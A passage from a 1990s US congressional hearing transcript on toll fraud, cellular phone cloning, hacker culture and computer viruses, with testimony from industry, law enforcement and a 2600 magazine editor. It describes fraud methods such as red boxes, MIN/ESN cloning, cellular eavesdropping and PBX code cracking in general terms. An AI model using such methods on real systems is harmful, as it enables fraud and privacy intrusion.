we studied the problem from 1988 to 1991 and concluded that the average toll fraud loss was $168,000. We did a national survey from November of last year to March of this year, and the average loss was $125,000, although it was retrospective. Today we think the average loss is $30,000 to $60,000, which shows a rather dramatic decline. The problem is, as the long distance thieves, sometimes called hackers, are rooted out of one system, one user system, they immediately hop into another one. So severity is dropping, but frequency is increasing. Everybody is victimized. You have heard business users with some very dramatic and very sad tales. The truth is that everybody is victimized; the users are victimized; the long distance carriers are victimized; the cellular carriers are victimized, the operator service providers; the co-cod folks, the aggregators and resellers are victimized; the LEC's and RBOC's, to a limited extent, are victimized; and the vendors are victimized by being drawn into the problem. Who is at fault? Everybody is at fault. The Government is at fault. The FCC has taken a no-action, apathetic attitude toward toll fraud. That Agency is undermanned, it is understaffed, it is underfunded, it has difficult problems -- no question about that -- but things could and should be done by that Agency that have not been done. The long distance carriers ignored the problem for far too long, pretended that they could not monitor when, in fact, the technology was available. They have done an outstanding job over the last 2 years of getting with it and engaging themselves fully, and I would say the long distance carriers, at the moment, are probably the best segment of anyone at being proactive to take care of the problem. Users too often ignored security, ignored their user manuals, failed to monitor, failed to properly manage. There has been improvement which has come with the public knowledge of the problem. CPE venders, those folks who manufactured the systems that are so easy to penetrate, have done an abysmally poor job of engineering into the systems security features. They have ignored security. Their manuals didn't deal with security. They are starting to now. They are doing a far better job. More needs to be done. The FCC, in particular, needs to become active. This committee needs to focus more attention on the problem, jawbone, keep the heat on the industry, the LEC's and the RBOC's in particular. The LEC's and the RBOC's have essentially ignored the problem. They are outside the loop, they say, yet the LEC's and the RBOC's collected over $21 billion last year in access fees for connecting their users to the long distance networks. How much of that $21 billion did the LEC's and the RBOC's reinvest in helping to protect their users from becoming victimized and helping to combat user-targeted toll fraud? No more than $10 million, one-fifth of 1 percent. Many people in the industry feel the LEC's and the RBOC's are the one large group that has yet to seriously come to the table. Many in the industry -- and we happen to agree -- feel that 3 to 4 percent of those access fees should be reinvested in protecting users from being targeted by the toll fraud criminals. The FCC should become more active. The jawboning there is at a minimal level. There was one show hearing last October, lots of promises, no action, no regulation, no initiatives, no meetings. A lot could be done. Under part 68, for example, the FCC, which is supposed to give clearance to any equipment before it is connected into the network, they could require security features embedded within that equipment. They could prevent things like low-end PBX's from being sold with three-digit barrier codes that anyone can penetrate in 3 to 5 minutes. Thank you, Mr. Chairman. Mr. MARKEY. THANK YOU, MR. HAUGH, VERY MUCH. Mr. Goldstein, let's go to you next. STATEMENT OF EMMANUEL GOLDSTEIN Mr. GOLDSTEIN. Thank you, Mr. Chairman, and thank you to this committee for allowing me the opportunity to speak on behalf of those who, for whatever reason, have no voice. I am in the kind of unique position of being in contact with those people known as computer hackers throughout the world, and I think one of the misconceptions that I would like to clear up, that I have been trying to clear up, is that hackers are analogous to criminals. This is not the case. I have known hundreds of hackers over the years, and a very, very small percentage of them are interested in any way in committing any kind of a crime. I think the common bond that we all have is curiosity, an intense form of curiosity, something that in many cases exceeds the limitations that many of us would like to put on curiosity. The thing is though, you cannot really put a limitation on curiosity, and that is something that I hope we will be able to understand. I like to parallel the hacker culture with any kind of alien culture because, as with any alien culture, we have difficulty understanding its system of values, we have difficulty understanding what it is that motivates these people, and I hope to be able to demonstrate through my testimony that hackers are friendly people, they are curious people, they are not out to rip people off or to invade people's privacy; actually, they are out to protect those things because they realize how valuable and how precious they really are. I like to draw analogies to where we are heading in the world of high technology, and one of the analogies I have come up with is to imagine yourself speeding down a highway, a highway that is slowly becoming rather icy and slippery, and ask yourself the question of whether or not you would prefer to be driving your own car or to be somewhere inside a large bus, and I think that is kind of the question we have to ask ourselves now. Do we want to be in control of our own destiny as far as technology goes, or do we want to put all of our faith in somebody that we don't even know and maybe fall asleep for a little while ourselves and see where we wind up? It is a different answer for every person, but I think we need to be able to at least have the opportunity to choose which it is that we want to do. Currently, there is a great deal of suspicion, a great deal of resignation, hostility, on behalf of not simply hackers but everyday people on the street. They see technology as something that they don't have any say in, and that is why I particularly am happy that this committee is holding this hearing, because people, for the most part, see things happening around them, and they wonder how it got to that stage. They wonder how credit files were opened on them; they wonder how their phone numbers are being passed on through A&I and caller ID. Nobody ever went to these people and said, "Do you want to do this? Do you want to change the rules?" The thing that hackers have learned is that any form of technology can and will be abused, whether it be calling card numbers or the Clipper chip. At some point, something will be abused, and that is why it is important for people to have a sense of what it is that they are dealing with and a say in the future. I think it is also important to avoid inequities in access to technology, to create a society of haves and have-nots, which I feel we are very much in danger of doing to a greater extent than we have ever done before. A particular example of this involves telephone companies, pay phones to be specific. Those of us who can make a telephone call from, say, New York to Washington, D.C., at the cheapest possible rate from the comfort of our own homes will pay about 12 cents for the first minute. However, if you don't have a phone or if you don't have a home, you will be forced to pay $2.20 for that same first minute. What this has led to is the proliferation of what are known as red boxes. I have a sample (indicating exhibit). Actually, this is tremendously bigger than it needs to be. A red box can be about a tenth of the size of this. But just to demonstrate the sound that it takes for the phone company to believe that you have put a quarter into the phone (brief tone is played), that is it, that is a quarter. Now we can say this is the problem, this huge demonic device here is what is causing all the fraud, but it is not the case. This tape recorder here (same brief tone is played) does the same thing. So now we can say the tones are the problem, we can make tones illegal, but that is going to be very hard to enforce. I think what we need to look at is the technology itself: Why are there gaping holes in them? and why are we creating a system where people have to rip things off in order to get the same access that other people can get for virtually nothing? I think a parallel to that also exists in the case of cellular phones. I have a device here (indicating exhibit) which I won't demonstrate, because to do so would be to commit a Federal crime, but by pressing a button here within the course of 5 seconds we will be able to hear somebody's private, personal cellular phone call. Now the way of dealing with privacy with cellular phone calls is to make a law saying that it is illegal to listen. That is the logic we have been given so far. I think a better idea would be to figure out a way to keep those cellular phone calls private and to allow people to exercise whatever forms of privacy they need to have on cellular phone calls. So I think we need to have a better understanding both from the legislative point of view and in the general public as far as technology in itself, and I believe we are on the threshold of a very positive, enlightened period, and I see that particularly with things like the Internet which allow people access to millions of other people throughout the world at very low cost. I think it is the obligation of all of us to not stand in the way of this technology, to allow it to go forward and develop on its own, and to keep a watchful eye on how it develops but at the same time not prevent it through overlegislation or overpricing. Thank you very much for the opportunity to speak. Mr. MARKEY. Thank you, Mr. Goldstein. Dr. Tippett. STATEMENT OF PETER S. TIPPETT Mr. TIPPET. Thank you. I am Peter Tippett from Symantec Corporation, and today I am also representing the National Computer Security Association and the Computer Ethics Institute. Today is Computer Virus Awareness Day, in case you are not aware, and we can thank Jack Fields, Representative Fields, for sponsoring that day on behalf of the Congress, and I thank you for that. We had a congressional briefing this morning in which nine representatives from industry, including telecommunications and aerospace and the manufacturing industry, convened, and for the first time were willing to talk about their computer virus problems in public. I have got to tell you that it is an interesting problem, this computer virus problem. It is a bit different from telephone fraud. The virus problem is one which has probably among the most misrepresentation and misunderstanding of these various kinds of fraud that are going on, and I would like to highlight that a little bit. But before I do, I would like to suggest what we know to be the costs of computer viruses just in America. The data I am representing comes from IBM and DataQuest, a Dunn and Bradstreet company, it is the most conservative interpretation you could make from this data. It suggests that a company of only a thousand computers has a virus incident every quarter, that a typical Fortune 500 company deals with viruses every month, that the cost to a company with only a thousand computers is about $170,000 a year right now and a quarter of a million dollars next year. If we add these costs up, we know that the cost to United States citizens of computer viruses just so far, just since 1990, exceeds $1 billion. When I go through these sorts of numbers, most of us say, well, that hype again, because the way the press and the way we have heard about computer viruses has been through hype oriented teachings. So the purpose here is not to use hype and not to sort of be alarmist and say the world is ending, because the world isn't ending per se, but to suggest that there isn't a Fortune 500 company in the United States who hasn't had a computer virus problem is absolutely true, and the sad truth about these viruses is that the misconceptions are keeping us from doing the right things to solve the problem, and the misconceptions stem from the fact that companies that are hit by computer viruses, which is every company, refused to talk about that until today. There are a couple of other unique things and misconceptions about computer viruses. One is that bulletin boards are the leading source of computer viruses. Bulletin boards represent the infancy of the superhighway, I think you could say, and there are a lot of companies that make rules in their company that you are not allowed to use bulletin boards because you might get a virus. In fact, it is way in the low, single-digit percents. It may be as low as 1 percent of computer viruses that are introduced into companies come through some route via a bulletin board. We are told that some viruses are benign, and, in fact, most people who write computer viruses think that their particular virus is innocuous and not harmful. It turns out that most virus authors, as we just heard from Mr. Goldstein, are, in fact, curious people and not malicious people. They are young, and they are challenged, and there is a huge game going on in the world. There is a group of underground virus bulletin boards that we call virus exchange bulletin boards in which people are challenged to write viruses. The challenge works like this: If you are interested and curious, you read the threads of communication on these bulletin boards, and they say, you know, "If you want to download some viruses, there's a thousand here on the bulletin board free for your downloading," but you need points. Well, how do you get points? Well, you upload some viruses. Well, where do you get some viruses from? If you upload the most common viruses, they are not worth many points, so you have to upload some really good, juicy viruses. Well, the only way to get those is to write them, so you write a virus and upload your virus, and then you gain acceptance into the culture, and when you gain acceptance into the culture you have just added to the problem. It is interesting to know that the billion dollars that we have spent since 1990 on computer viruses just in the United States is due to viruses that were written in 1988 and 1987. Back then, we only had one or two viruses a quarter, new, introduced into the world. This year we have a thousand new computer viruses introduced into our community, and it won't be for another 4 or 5 years before these thousand viruses that are written now will become the major viruses that hurt us in the future. So virus authors don't believe they are doing anything wrong, they don't believe that they are being harmful, and they don't believe that what they do is dangerous, and, in fact, all viruses are. Computer crime laws don't have anything to do with computer virus writers, so we heard testimony this morning from Scott Charney of the Department of Justice who suggested that authorized access is the biggest law you could use, and, in fact, most viruses are brought into our organizations in authorized ways, because users who are legitimate in the organizations accidentally bring these things in, and then they infect our companies. In summary, I think that we need to add a little bit of specific wording in our computer crime legislation that relates particularly to computer viruses and worms. We need, in particular, to educate. We need to go after an ethics angle. We need to get to the point where Americans think that writing viruses or doing these other kinds of things that contaminate our computer superhighways are akin to contaminating our expressways. In the sixties we had a big "Keep America Beautiful" campaign, and most Americans would find it unthinkable to throw their garbage out the window of their car, but we don't think it unthinkable to write rogue programs that will spread around our highway. Thank you. Mr. MARKEY. Thank you, Dr. Tippett. Mr. Guidry. STATEMENT OF MICHAEL A. GUIDRY Mr. GUIDRY. Thank you, Mr. Chairman, for giving me the opportunity to appear before this subcommittee, and thank you, subcommittee, for giving me this opportunity. The Guidry Group is a Houston-based security consulting firm specializing in telecommunication issues. We started working in telecommunication issues in 1987 and started working specifically with the cellular industry at that time. When we first started, we were working with the individual carriers across the United States, looking at the hot points where fraud was starting to occur, which were major metropolitan cities of course. In 1991, the Cellular Telephone Industry Association contacted us and asked us to work directly with them in their fight against cellular fraud. The industry itself has grown, as we all know, quite rapidly. However, fraud in the industry has grown at an unbelievable increase, actually faster than the industry itself, and as a result of that fraud now is kind of like a balloon, a water balloon; it appears in one area, and when we try to stamp it out it appears in another area. As a result, what has happened is, when fraud first started, there was such a thing as subscription fraud, the same type of fraud that occurred with the land line telecommunication industry. That subscription fraud quickly changed. Now what has occurred is, technology has really stepped in. First, hackers, who are criminals or just curious people, would take a telephone apart, a cellular phone apart, and change the algorithm on the chip, reinsert the chip into the telephone, and cause that telephone to tumble. Well, the industry put its best foot forward and actually stopped, for the most part, the act of tumbling in cellular telephones. But within the last 18 months something really terrible has happened, and that is cloning. Cloning is the copying of the MIN and and ESN number, and, for clarification, the MIN is the Mobile Identification Number that is assigned to you by the carrier, and the ESN number is the Electronic Cellular Number that is given to the cellular telephone from that particular manufacturer. As a result, now we have perpetrators, or just curious people, finding ways to copy the MIN and the ESN, thereby victimizing the cellular carrier as well as the good user, paying subscriber. This occurs when the bill is transmitted by the carrier to the subscriber and he says something to the effect of, "I didn't realize that I had made $10,000 worth of calls to the Dominican Republic," or to Asia or Nicaragua or just any place like that. Now what has happened is, those clone devices have been placed in the hands of people that we call ET houses, I guess you would say, and they are the new immigrants that come into the United States for the most part that do not have telephone subscriptions on the land line or on the carrier side from cellular, and now they are charged as much as $25 for 15 minutes to place a call to their home. Unfortunately, though, the illicit behavior of criminals has stepped into this network also. Now we have gang members, drug dealers, and gambling, prostitution, vice, just all sorts of crime, stepping forward to use this system where, by using the cloning, they are avoiding law enforcement. Law enforcement has problems, of course, trying to find out how to tap into those telephone systems and record those individuals. Very recently, cloning has even taken a second step, and that is now something that we term the magic phone, and the magic phone works like this: Instead of cloning just one particular number, it clones a variety of numbers, as many as 14 or 66, thereby distributing the fraud among several users, which makes it almost virtually impossible for us to detect at an early stage. In response to this, what has happened? A lot of legitimate people have started to look at using the illegitimate cellular services. They are promised that this is a satellite phone or just a telephone that if they pay a $2,500 fee will avoid paying further bills. So now it has really started to spread. Some people in major metropolitan areas, such as the Southwest, Northeast, and Southeast, have started running their own mini-cellular companies by distributing these cloning phones to possible clients and users, collecting the fee once a month to reactivate the phone if it is actually denied access. The cellular industry has really stepped up to the plate I think the best they can right now in trying to combat this by working with the switch manufacturers and other carriers, 150 of them to date with the cellular telephone industry, as well as the phone manufacturers, and a lot of companies have started looking at software technology. However, these answers will not come to pass very soon. What we must have is strong legislation. We have been working for the last 18 months, specifically with the Secret Service and a lot of local, State, and Federal law enforcement agencies. The Service has arrested over 100 people involved in cellular fraud. We feel very successful about that. We also worked with local law enforcement in Los Angeles to form the L.A. Blitz, and we arrested an additional 26 people and seized 66 illegal telephones and several computers that spread this cloning device. However, now we have a problem. U.S. Title 18, 1029, does not necessarily state cellular or wireless. It is very important, and I pray that this committee will look at revising 1029 and changing it to include wireless and cellular. I think wireless communications, of course, like most people, is the wave of the future, and it is extremely important that we include that in the legislation so that when people are apprehended they can be prosecuted. Thank you, sir. Mr. MARKEY. Thank you, Mr. Guidry, very much. We will take questions now from the subcommittee members. Let me begin, Mr. Delaney. I would like you and Mr. Goldstein to engage in a conversation, if we could. This is Mr. Goldstein's magazine, "The Hacker Quarterly: 2600," and for $4 we could go out to Tower Records here in the District of Columbia and purchase this. It has information in it that, from my perspective, is very troubling in terms of people's cellular phone numbers and information on how to crack through into people's private information. Now you have got some problems with "The Hacker Quarterly," Mr. Delaney. Mr. DELANEY. Yes, sir. Mr. MARKEY. And your problem is, among other things, that teenagers can get access to this and go joy riding into people's private records. Mr. DELANEY. Yes, sir. In fact, they do. Mr. MARKEY. Could you elaborate on what that problem is? And then, Mr. Goldstein, I would like for you to deal with the ethical implications of the problem as Mr. Delaney would outline them. Mr. DELANEY. Well, the problem is that teenagers do read the "2600" magazine. I have witnessed teenagers being given free copies of the magazine by the editor-in-chief. I have looked at a historical perspective of the articles published in "2600" on how to engage in different types of telecommunications fraud, and I have arrested teenagers that have read that magazine. The publisher, or the editor-in-chief, does so with impunity under the cloak of protection of the First Amendment. However, as I indicated earlier, in that the First Amendment has been abridged for the protection of juveniles from pornography, I also feel that it could be abridged for juveniles being protected from manuals on how to commit crime -- children, especially teenagers, who are hackers, and who, whether they be mischievous or intentionally reckless, don't have the wherewithal that an adult does to understand the impact of what he is doing when he gets involved in this and ends up being arrested for it. Mr. MARKEY. Mr. Goldstein, how do we deal with this problem? Mr. GOLDSTEIN. First of all, "2600" is not a manual for computer crime. What we do is, we explain how computers work. Very often knowledge can lead to people committing crimes, we don't deny that, but I don't believe that is an excuse for withholding the knowledge. The article on cellular phones that was printed in that particular issue pretty much goes into detail as to how people can track a cellular phone call, how people can listen in, how exactly the technology works. These are all things that people should know, and perhaps if people had known this at the beginning they would have seen the security problems that are now prevalent, and perhaps something could have been done about it at that point. Mr. MARKEY. Well, I don't know. You are being a little bit disingenuous here, Mr. Goldstein. Here, on page 17 of your spring edition of 1993, "How to build a pay TV descrambler." Now that is illegal. Mr. GOLDSTEIN. Not building. Building one is not illegal. Mr. MARKEY. Oh, using one is illegal? Mr. GOLDSTEIN. Exactly. Mr. MARKEY. I see. So showing a teenager, or anyone, how to build a pay TV descrambler is not illegal. But what would they do then, use it as an example of their technological prowess that they know how to build one? Would there not be a temptation to use it, Mr. Goldstein? Mr. GOLDSTEIN. It is a two-way street, because we have been derided by hackers for printing that information and showing the cable companies exactly what the hackers are doing. Mr. MARKEY. I appreciate it from that perspective, but let's go over to the other one. If I am down in my basement building a pay TV descrambler for a week, am I not going to be tempted to see if it works, Mr. Goldstein? Or how is it that I then prove to myself and my friends that I have actually got something here which does work in the real world? Mr. GOLDSTEIN. It is quite possible you will be tempted to try it out. We don't recommend people being fraudulent -- Mr. MARKEY. How do you know that it works, by the way? Mr. GOLDSTEIN. Actually, I have been told by most people that is an old version that most cable companies have gotten beyond. Mr. MARKEY. So this wouldn't work then? Mr. GOLDSTEIN. It will work in some places, it won't work in all places. Mr. MARKEY. Oh, it would work? It would work in some places? Mr. GOLDSTEIN. Most likely, yes. But the thing is, we don't believe that because something could be used in a bad way, that is a reason to stifle the knowledge that goes into it. Mr. MARKEY. That is the only way this could be used. Is there a good way in which a pay TV descrambler could be used that is a legal way? Mr. GOLDSTEIN. Certainly, to understand how the technology works in the first place, to design a way of defeating such devices in the future or to build other electronic devices based on that technology. Mr. MARKEY. I appreciate that, but it doesn't seem to me that most of the subscribers to "2600" magazine -- Mr. GOLDSTEIN. That is interesting that you are pointing to that. That is our first foray into cable TV. We have never even testified on the subject before. Mr. MARKEY. I appreciate that. Well, let's move on to some of your other forays here. What you have got here, it seems to me, is a manual where you go down Maple Street and you just kind of try the door on every home on Maple Street. Then you hit 216 Maple Street, and the door is open. What you then do is, you take that information, and you go down to the corner grocery store, and you post it: "The door of 216 Maple is open." Now, of course, you are not telling anyone to steal, and you are not telling anyone that they should go into 216 Maple. You are assuming that everyone is going to be ethical who is going to use this information, that the house at 216 Maple is open. But the truth of the matter is, you have got no control at this point over who uses that information. Isn't that true, Mr. Goldstein? Mr. GOLDSTEIN. The difference is that a hacker will never target an individual person as a house or a personal computer or something like that. What a hacker is interested in is wide open, huge data bases that contain information about people, such as TRW. A better example, I feel, would be one that we tried to do 2 years ago where we pointed out that the Simplex Lock Corporation had a very limited number of combinations on their hardware locks that they were trying to push homeowners to put on their homes, and we tried to alert everybody as to how insecure these are, how easy it is to get into them, and people were not interested. Hackers are constantly trying to show people how easy it is to do certain things. Mr. MARKEY. I appreciate what you are saying. From one perspective, you are saying that hackers are good people out there, almost like -- what are they called? -- the Angels that patrol the subways of New York City. Mr. GOLDSTEIN. Guardian Angels. I wouldn't say that though. Mr. MARKEY. Yes, the Guardian Angels, just trying to protect people. But then Mr. Delaney here has the joy riders with the very same information they have taken off the grocery store bulletin board about the fact that 216 Maple is wide open, and he says we have got to have some laws on the books here to protect against it. So would you mind if we passed, Mr. Goldstein, trespassing laws that if people did, in fact, go into 216 and did do something wrong, that we would be able to punish them legally? Would you have a problem with that? Mr. GOLDSTEIN. I would be thrilled if computer trespassing laws were enforced to the same degree as physical trespassing laws, because then you would not have teenage kids having their doors kicked in by Federal marshals and being threatened with $250,000 fines, having all their computer equipment taken and having guns pointed at them. You would have a warning, which is what you get for criminal trespass in the real world, and I think we need to balance out the real world -- Mr. MARKEY. All right. So you are saying, on the one hand, you have a problem that you feel that hackers are harassed by law enforcement officials and are unduly punished. We will put that on one side of the equation. But how about the other side? How about where hackers are violating people's privacy? What should we do there, Mr. Goldstein? Mr. GOLDSTEIN. When a hacker is violating a law, they should be charged with violating a particular law, but that is not what I see today. I see law enforcement not having a full grasp of the technology. A good example of this was raids on people's houses a couple of years ago where in virtually every instance a Secret Service agent would say, "Your son is responsible for the AT&T crash on Martin Luther King Day," something that AT&T said from the beginning was not possible. Mr. MARKEY. Again, Mr. Goldstein, I appreciate that. Let's go to the other side of the problem, the joy rider or the criminal that is using this information. What penalties would you suggest to deal with the bad hacker? Are there bad hackers? Mr. GOLDSTEIN. There are a few bad hackers. I don't know any myself, but I'm sure there are. Mr. MARKEY. I assume if you knew any, you would make sure we did something about them. But let's just assume there are bad people subscribing. What do we do about the bad hacker? Mr. GOLDSTEIN. Well, I just would like to clarify something. We have heard here in testimony that there are gang members and drug members who are using this technology. Now, are we going to define them as hackers because they are using the technology? Mr. MARKEY. Yes. Well, if you want to give them another name, fine. We will call them hackers and crackers, all right? Mr. GOLDSTEIN. I think we should call them criminals. Mr. MARKEY. So the crackers are bad hackers, all right? If you want another word for them, that is fine, but you have got the security of individuals decreasing with the sophistication of each one of these technologies, and the crackers are out there. What do we do with the crackers who buy your book? Mr. GOLDSTEIN. I would not call them crackers. They are criminals. If they are out there doing something for their own benefit, selling information -- Mr. MARKEY. Criminal hackers. What do we do with them? Mr. GOLDSTEIN. There are existing laws. Stealing is still stealing. Mr. MARKEY. OK. Fine. Dr. Tippett. Mr. TIPPETT. I think that the information age has brought on an interesting dilemma that I alluded to earlier. The dilemma is that the people who use computers don't have parents who used computers, and therefore they didn't get the sandbox training on proper etiquette. They didn't learn you are not supposed to spit in other people's faces or contaminate the water that we drink, and we have a whole generation now of 100 million in the United States computer users, many of whom can think this through themselves, but, as we know, there is a range of people in any group, and we need to point out the obvious to some people. It may be the bottom 10 percent. Mr. MARKEY. What the problem is, of course, is that the computer hacker of today doesn't have a computer hacker parent, so parents aren't teaching their children how to use their computers because parents don't know how to use computers. So what do we do? Mr. TIPPETT. It is incumbent upon us to do the same kind of thing we did in the sixties to explain that littering wasn't right. It is incumbent upon us to take an educational stance and for Congress to credit organizations, maybe through a tax credit or through tax deductions, for taking those educational opportunities and educating the world of people who didn't have sandbox training what is good and what is bad about computing. So at least the educational part needs to get started, because I, for one, think that probably 90 percent of the kids -- most of the kids who do most of the damage that we have all described up here, in fact, don't really believe they are doing any damage and don't have the concept of the broadness of the problem that they are doing. The 10 percent of people who are criminal we could go after potentially from the criminal aspect, but the rest we need to get after from a plain, straight ahead educational aspect. Mr. MARKEY. I appreciate that. I will just say in conclusion -- and this is for your benefit, Mr. Goldstein. When you pass laws, you don't pass laws for the good people. What we assume is that there are a certain percent of people -- 5 percent, 10 percent; you pick it -- who really don't have a good relationship with society as a whole, and every law that we pass, for the most part, deals with those people. Now, as you can imagine, when we pass death penalty statutes, we are not aiming it at your mother and my mother. It is highly unlikely they are going to be committing a murder in this lifetime. But we do think there is a certain percentage that will. It is a pretty tough penalty to have, but we have to have some penalty that fits the crime. Similarly here, we assume that there is a certain percentage of pathologically damaged people out there. The cerebral mechanism doesn't quite work in parallel with the rest of society. We have to pass laws to protect the rest of us against them. We will call them criminal hackers. What do we do to deal with them is the question that we are going to be confronted with in the course of our hearings? Let me recognize the gentleman from Texas, Mr. Fields. Mr. FIELDS. Thank you, Mr. Chairman. Just for my own edification, Mr. Goldstein, you appear to be intelligent; you have your magazine, so obviously you are entrepreneurial. For me personally, I would like to know, why don't you channel the curiosity that you talk about into something that is positive for society? And, I'm going to have to say to you, I don't think it is positive when you invade someone else's privacy. Mr. GOLDSTEIN. I agree. Mr. FIELDS. Whether it is an individual or a corporation. Mr. GOLDSTEIN. Well, I would like to ask a question in return then. If I discover that a corporation is keeping a file on me and I access that corporation's computer and find out or tell someone else, whose privacy am I invading? Or is the corporation invading my privacy? You see, corporations are notorious for not volunteering such information: "By the way, we are keeping files on most Americans and keeping track of their eating habits and their sexual habits and all kinds of other things." Occasionally, hackers stumble on to information like that, and you are much more likely to get the truth out of them because they don't have any interest to protect. Mr. FIELDS. Are you saying with this book that is what you are trying to promote? because when I look through this book, I find the same thing that the chairman finds, some things that could actually lead to criminal behavior, and when I see all of these codes regarding cellular telephones, how you penetrate and listen to someone's private conversation, I don't see where you are doing anything for the person, the person who is actually doing the hacking. I see that as an invasion of privacy. Mr. GOLDSTEIN. All right. I need to explain something then. Those are not codes, those are frequencies. Those are frequencies that anybody can listen to, and by printing those frequencies we are demonstrating how easy it is for anybody to listen to them. Now if I say that by tuning to 871 megahertz you can listen to a cellular phone call, I don't think I am committing a crime, I think I am explaining to somebody. What I have done at previous conferences is hold up this scanner and press a button and show people how easy it is to listen, and those people, when they get into their cars later on in the day, they do not use their cellular telephones to make private calls of a personal nature because they have learned something, and that is what we are trying to do, we are trying to show people how easy it is. Now, yes, that information can be used in a bad way, but to use that as an excuse not to give out the information at all is even worse, and I think it is much more likely that things may be fixed, the cellular industry may finally get its act together and start protecting phone calls. The phone companies might make red boxes harder to use or might make it easier for people to afford phone calls, but we will never know if we don't make it public. Mr. FIELDS. I want to be honest with you, Mr. Goldstein. I think it is frightening that someone like you thinks there is a protected right in invading someone else's privacy. Mr. Guidry, let me turn to you. How does a hacker get the codes that you were talking about a moment ago -- if I understood what you were saying correctly, the manual ID number, the other cellular numbers that allow them to clone? Mr. GUIDRY. Well, unfortunately, "2600" would be a real good bet to get those, and we have arrested people and found those manuals in their possession. The other way is quite simply just to what we call dumpster dive, and that is to go to cellular carriers where they may destroy trash. Unfortunately, some of it is shredded and put back together, some of it is not shredded, and kids, criminals, go into those dumpsters, withdraw that information, piece it together, and then experiment with it. That information then is usually sold for criminal activity to avoid prosecution. Mr. FIELDS. You are asking the subcommittee to include wireless and cellular, and I think that is a good recommendation. I think certainly that is one that we are going to take as good counsel. But it appears that much of what you are talking about is organized activity, and my question is, does the current punishment scheme actually fit the crime, or should we also look at increasing punishment for this type of crime? Mr. GUIDRY. I would strongly suggest that we increase the punishment for this sort of crime. It is unfortunate that some hackers take that information and sell it for criminal activity, and, as a result, if prosecution is not stiff enough, then it far outweighs the crime. Mr. FIELDS. What is the punishment now for this type of cellular fraud? Mr. GUIDRY. Right now, it can be as high as $100,000 and up to 20 years in the penitentiary. Mr. FIELDS. Mr. Delaney, do you feel that that is adequate? Mr. DELANEY. Under New York State law, which is what I deal with, as opposed to the Federal law, we can charge a host of felonies with regard to one illicit telephone call if you want to be creative with the law. Sections 1029 and 1039 really cover just about everything other than the cellular concern and the wireless concern. However, I think the thing that is not dealt with is the person who is running the call sell operations. The call selling operations are the biggest loss of revenue to the telephone companies, cellular companies. Whether they are using PBX's or call diverters or cellular phones, this is where all the fraud is coming from, and there is only a handful of people who are originating this crime. We have targeted these people in New York City right now, and the same thing is being done in Los Angeles and Florida, to determine who these people are that use just the telephone to hack out the codes on PBX's, use ESN readers made by the Curtis Company to steal the ESN and MIN's out of the air and then to disseminate this to the street phones and to the cellular phones that are in cars and deprive the cellular industry of about $300 million a year, and the rest of the telecommunications networks in the United States probably of about $1 billion a year, due to the call sell operations. In one particular case that we watched, as a code was hacked out on a PBX in a company in Massachusetts, the code was disseminated to 250 street phones within the period of a week. By the end of the month, a rather small bill of $40,000 was sent to the company, small only because they were limited by the number of telephone lines going through that company. Had it been a larger company whose code had been cracked by the finger hacker, the bill would have been in the hundreds of thousands of dollars, or over $1 million as typically some of the bills have been. But this is a relatively small group of people creating a tremendous problem in the United States, and a law specifically dealing with a person who is operating as an entrepreneur, running a call selling operation, I think would go far to ending one of the biggest problems we have. Mr. FIELDS. Let me ask so I understand, Mr. Delaney and Mr. Guidry, because I am a little confused, or maybe I just didn't understand the testimony, are these individual hackers acting separately, or are these people operating within a network, within an organization? Mr. DELANEY. These finger hackers are the people that control the network of people that operate telephone booths and cellular phones for reselling telephone service. These finger hackers are not computer hackers. Mr. FIELDS. When you say finger hackers, is this one person operating independently, or is that finger hacker operating in concert -- Mr. GUIDRY. No. He has franchised. He has franchised out. He actually sells the computer and the software and the cattail to do this to other people, and then they start their own little group. Now it is going internationally. Mr. FIELDS. Explain to me, if the chairman would permit -- Mr. MARKEY. Please. Mr. FIELDS. Explain to me the franchise. Mr. GUIDRY. What happens is, let's pretend we are in Los Angeles right now and I have the ability to clone a phone that is using a computer, a cattail, we call it, that goes from the computer, the back of the computer, into the telephone, and I have the diskette that tells me how to change that program. I can at some point sell the cloning. You can come to me, and I can clone your phone. However, that is one way for me to make money. The best way for me to make money is to buy computers, additional diskettes, and go to Radio Shack or some place and make additional cattails and say, "I can either clone your phone for $1,500, or what you can do for $5,000 is start your own company." So you say, "Well, wow, that's pretty good, because how many times would I have to sell one phone at from $500 to $1,500 to get my initial investment back?" As a result now, you have groups, you have just youngsters as well as organized crime stepping in. The Guidry Group has worked in the Philippines on this, we have worked in Mexico, the Dominican Republic, Chile, Argentina, and next week I will be in London and in Rome. It is so bad, sir, that now intelligence agencies in Rome have told me -- and that is what I am going there for -- that organized crime seems to think that telecommunications fraud is more lucrative, unfortunately, than drugs, and it is darned sure more lucrative in the Los Angeles, probably New York, and Miami areas, because right now prosecution is not that strong. It is unfortunate that all of law enforcement is not trained, nor could they be, to pick up on someone standing on a corner using an illegitimate phone. Mr. FIELDS. How would a person know where to get their telephone cloned? Mr. GUIDRY. Let me tell you what happens. Normally when we go into a major metropolitan city, or we also check the computer bulletin boards, a lot of times that information is there. Most of the time, though, it is in magazines, like green sheets, which are free advertisements saying, "Call anywhere in the world. Come to --" a location, or, "Call this number." Also in Los Angeles, for some reason, they seem to advertise a lot in sex magazines, and people will simply buy a sex magazine and there will be a statement in there, "Earn money the fast way. Start your own telecommunications company." And then we will follow up on that tip and work with the Secret Service to try to apprehend those people. Mr. FIELDS. Mr. Haugh. Mr. HAUGH. If I could just add a few comments, it would be most unfortunate if this denigrates into a discussion of adolescents who are curious and so-called finger hackers. The truth of the matter is that the toll fraudsters are adults, they are organized, they are smart, they are savvy, and the drug dealers in particular are learning very quickly that it is far more lucrative, far less dangerous, to go into the telecom crime business. "Finger hacking" is a term, but the truth is, war dialers, speed dialers, modems, automated equipment now will hack and crack into systems and break the codes overnight. While the criminal sleeps, his equipment penetrates those systems. He gets up in the morning, and he has got a print sheet of new numbers that his equipment penetrated overnight. We have interviewed the criminals involved. These so-called idle curiosity adolescents are being paid up to $10,000 a month for new codes. I don't call that curiosity, I call that venality. We are talking a $4 billion problem. The chairman came up with the Maple Street example. I think even better yet, Mr. Chairman, the truth is that 216 Maple had a security device on the door and a code, and what Mr. Goldstein and his ilk do is sell that code through selling subscriptions to these periodicals. There is a big difference, in my opinion, between saying, "216 Maple is open" -- that is bad enough -- than to say, "You go to 216 Maple, and push 4156, and you can get in the door." But we are talking about crime, we are talking about adults, we are talking about organized crime, perhaps not in the Cosa Nostra sense, but even the Cosa Nostra is wising up that they can finance some of these operations, and in New York and Los Angeles, in particular, the true Mafia is now beginning to finance some of these telecom fraud operations. Mr. FIELDS. Mr. Guidry, one last question. Is it the Secret Service that is at the 